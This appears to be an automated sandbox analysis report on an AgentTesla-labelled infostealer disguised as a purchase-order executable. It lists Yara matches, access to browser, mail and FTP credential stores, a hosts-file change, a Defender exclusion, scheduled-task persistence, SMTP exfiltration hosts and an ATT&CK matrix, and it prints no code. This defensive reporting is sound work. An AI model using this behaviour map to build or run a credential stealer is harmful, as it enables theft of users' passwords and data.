                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File written: C:\Windows\System32\drivers\etc\hosts

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara match | File source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 7124, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 6676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jVULYR.exe PID: 5908, type: MEMORYSTR
MITRE ATT&CK Matrix (columns, left to right): Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact

Each row below lists the populated cells of one matrix row, left to right (empty cells are omitted). Digits preceding a technique name are the count badges shown in that matrix cell, concatenated as extracted.

Row 1: Valid Accounts | 211 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 1 File and Directory Permissions Modification | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Row 2: Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 Disable or Modify Tools | 1 Credentials in Registry | 114 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Row 3: Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Row 4: Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 3 Obfuscated Files or Information | NTDS | 311 Security Software Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
Row 5: Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 13 Software Packing | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Row 6: Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
Row 7: External Remote Services | Scheduled Task | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Row 8: Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Row 9: Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 626538
Sample: Purchase order 450080088 pr...
Startdate: 14/05/2022
Architecture: WINDOWS
Score: 100

Process tree and edges recovered from the graph dump (bracketed numbers are the count badges attached to the process nodes; see the legend above):

Sample start node
  DNS/IP: us2.smtp.mailhostbox.com; smtp.transmase.com
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 14 other signatures
  Started: Purchase order 450080088 proj. Allt Charnan.exe [7]
    Dropped: C:\Users\user\AppData\Roaming\NpPgfycY.exe (PE32); C:\Users\...\NpPgfycY.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp86F3.tmp (XML); Purchase order 450...llt Charnan.exe.log (ASCII)
    Signatures: Adds a directory exclusion to Windows Defender
    Started: Purchase order 450080088 proj. Allt Charnan.exe [2 9]
      DNS/IP: 162.222.225.16, ports 49752, 587 (PUBLIC-DOMAIN-REGISTRYUS, United States); us2.smtp.mailhostbox.com 208.91.198.38, ports 49747, 49823, 49837 (PUBLIC-DOMAIN-REGISTRYUS, United States); 2 other IPs or domains
      Dropped: C:\Users\user\AppData\Roaming\...\jVULYR.exe (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\...\jVULYR.exe:Zone.Identifier (ASCII)
      Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Modifies the hosts file; Hides that the sample has been downloaded from the Internet (zone.identifier)
    Started: powershell.exe [25]
      Started: conhost.exe
    Started: schtasks.exe [1]
      Started: conhost.exe
    Started: Purchase order 450080088 proj. Allt Charnan.exe
  Started: jVULYR.exe
    Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
    Started: jVULYR.exe
      DNS/IP: smtp.transmase.com
    Started: schtasks.exe
      Started: conhost.exe
  Started: jVULYR.exe
    Started: jVULYR.exe
      DNS/IP: smtp.transmase.com
      Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
    Started: schtasks.exe
      Started: conhost.exe



Source | Detection | Scanner | Label | Link
Purchase order 450080088 proj. Allt Charnan.exe | 38% | Virustotal | | Browse
Purchase order 450080088 proj. Allt Charnan.exe | 62% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
Purchase order 450080088 proj. Allt Charnan.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\NpPgfycY.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\NpPgfycY.exe | 62% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | 62% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
Source | Detection | Scanner | Label | Link | Download
29.0.jVULYR.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
25.2.jVULYR.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
29.0.jVULYR.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
29.2.jVULYR.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
